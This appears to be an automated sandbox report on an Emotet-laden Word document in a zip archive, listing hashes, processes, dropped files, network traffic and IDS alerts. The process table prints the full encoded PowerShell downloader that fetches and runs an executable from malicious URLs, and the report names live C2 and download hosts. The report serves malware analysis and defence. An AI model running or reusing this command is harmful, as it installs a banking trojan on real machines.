File name: | d8969695561d01657d90d60a6915275742b1d1f1.zip |
Full analysis: | https://app.any.run/tasks/1c9ff18e-cc00-4104-8295-1977de71b90d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 09:22:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | DA47B9FCE4AD39097439DF9FC09B1851 |
SHA1: | EE857677C55969C1121CA3A15C5E919950967453 |
SHA256: | F6567260E2333FA894368DE4DCB34394FCEA59F8ABE445F3C90EF1CDA1AB130F |
SSDEEP: | 3072:UyViawinDINltvYFBX8aqvejypOHomvoLaSTpeUxLPRp:9xwPN/el8HvejfHomr7U |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:19 11:16:19 |
ZipCRC: | 0x68205553 |
ZipCompressedSize: | 147334 |
ZipUncompressedSize: | 254938 |
ZipFileName: | d8969695561d01657d90d60a6915275742b1d1f1 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2736 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\d8969695561d01657d90d60a6915275742b1d1f1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2940 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2804 | powershell -encod JABSAE0AbwBqAGYAWABFAFUAPQAnAGgAdwBpAF8ATgAyAFIAQgAnADsAJABDAFkAWQBmADIAUgBRADkAIAA9ACAAJwAyADAAOAAnADsAJABXAGkAaABMAFgATwBsAD0AJwBZAHIAZABVAHEAWQBSACcAOwAkAHYAUwBfADAAUwBCAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAWQBZAGYAMgBSAFEAOQArACcALgBlAHgAZQAnADsAJABmAE8AcgBOAHcARQBSAD0AJwBPAF8AXwBPAHYAWABIACcAOwAkAE0AagBfAHoAdwBqAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJAB2AG0AMwBQAFAATwA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAZQBmAG8AcgB0AHUAbgBhAHQAZQBuAHUAdAByAGkAdABpAG8AbgAuAGMAbwBtAC8AdgB1AHoAcAA0AG8AMgB2AGIALwBoADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAYQBuAGcAcgBlAGEAbABpAHQAeQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB2ADcAcgByADcALwBAAGgAdAB0AHAAcwA6AC8ALwBjAG8AZABlAG4AcABpAGMALgBjAG8AbQAvAHcAYQBuAGQAZQByAHYAbwBnAGUAbAAvADcAMABtAGoAYQA0AC8AQABoAHQAdABwADoALwAvAHAAaQBuAG0AbwB2AGEALgB4AHkAegAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGkAZABzAHIAYQBxADQANgA4ADUALwBAAGgAdAB0AHAAcwA6AC8ALwBlAGMAYQBtAHAAdQBzAGsAYgBkAHMALgBjAG8AbQAvAHYAbgBnAHAALwB2ADQAMAA1AC8AJwAuACIAUwBgAHAAbABpAFQAIgAoACcAQAAnACkAOwAkAEYAVQBIAEkAZABtAGkAPQAnAFAASwBVADEAawBmAGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADgAdABwAGkAQgAgAGkAbgAgACQAdgBtADMAUABQAE8AKQB7AHQAcgB5AHsAJABNAGoAXwB6AHcAagAuACIARABPAHcATgBsAGAAbwBBAGQARgBJAGAAbABlACIAKAAkAEUAagA4AHQAcABpAEIALAAgACQAdgBTAF8AMABTAEIAYgApADsAJABMAHcAYwA1AGQAMgBUAHMAPQAnAHcARgBNAHcAdQBLACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdgBTAF8AMABTAEIAYgApAC4AIgBsAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIAOAA5ADQANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJAB2AFMAXwAwAFMAQgBiACkAOwAkAG0ARgBwAFQASABfAHUAPQAnAFYAZgByAEsAMABPAHEAJwA7AGIAcgBlAGEAawA7ACQAVwBwAFMASwA1ADQATwA9ACcAegBqAEcAYQBEAEsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABqAGMAVQA2AHUAdwA9ACcASQBpAHcASAAwAEYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3924 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3524 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2364 | --7522c4b8 | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2356 | --7522c4b8 | C:\Users\admin\208.exe | 208.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2136 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3588 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3228 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREBCC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C92DA575.wmf | wmf | |
MD5:FFD53E9149243297DBB36970DD35B74C | SHA256:BC067296661CED40576A3E8F81A6DA4AD711C1B7B2BD54E0A5DB736E3E36AEB4 | |||
2736 | WinRAR.exe | C:\Users\admin\Desktop\d8969695561d01657d90d60a6915275742b1d1f1 | document | |
MD5:D02E69B880B316F3A4C99E5381A76B58 | SHA256:9D53955436AFF93002D5589F249CCFFB3BFF5D7F6CCFEFB0A45C18FCB48B4F0D | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB49AC4B.wmf | wmf | |
MD5:CE6D2F19594887E6A3216F3EA6F19157 | SHA256:FC3270CF801462ED384FE1527FE4C317E406602F7AC7366CFA67799ABCDC406E | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FAB04F2.wmf | wmf | |
MD5:8E42ACFD97D9DE0E2CF9868DF1CD9208 | SHA256:7AC0311128D77F29A7A970B71143E8D0DAC58E96FEEB16F47B5A0227B85E5C2F | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2043360F374FB8B2D7869DAB53EEC8EC | SHA256:E503717E8B134CC6F74FE5F788E5C14F8E4DFF8E20E390EF7393B35F04B5B6D6 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14F3FD6D.wmf | wmf | |
MD5:C910D547CDB12F4185FD93C214BFCF60 | SHA256:939C550745B57E4920C6349AD42E505A7BBAE9A715627523D3710884055DAE43 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BFFB309.wmf | wmf | |
MD5:6C6699776656C940FB58F9123E877817 | SHA256:E2206AE7D78E5CCA6C38042337E348D5A64A64F4754210F9C380894BB08C7693 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF16DF03.wmf | wmf | |
MD5:5F8BB68F7F6DDB4A55676F5A705F61B5 | SHA256:44FE781EA3153136C5F5D68B1F8EF400FDE9CEC2D6E0E0BDD37A626BDB852684 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:F57C4E9ED3B29A11DEF3DFEA2071FA53 | SHA256:711DDFB9C7512A241E617A6215B6F991220F69479B45474980594928BDC938B6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2804 | powershell.exe | GET | 200 | 45.76.184.98:80 | http://thefortunatenutrition.com/vuzp4o2vb/h3/ | SG | executable | 376 Kb | malicious |
3964 | easywindow.exe | POST | 200 | 114.79.134.129:443 | http://114.79.134.129:443/walk/publish/ringin/ | IN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
2804 | powershell.exe | 45.76.184.98:80 | thefortunatenutrition.com | Choopa, LLC | SG | suspicious |
Domain | IP | Reputation |
---|---|---|
thefortunatenutrition.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2804 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2804 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2804 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3964 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3964 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3964 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |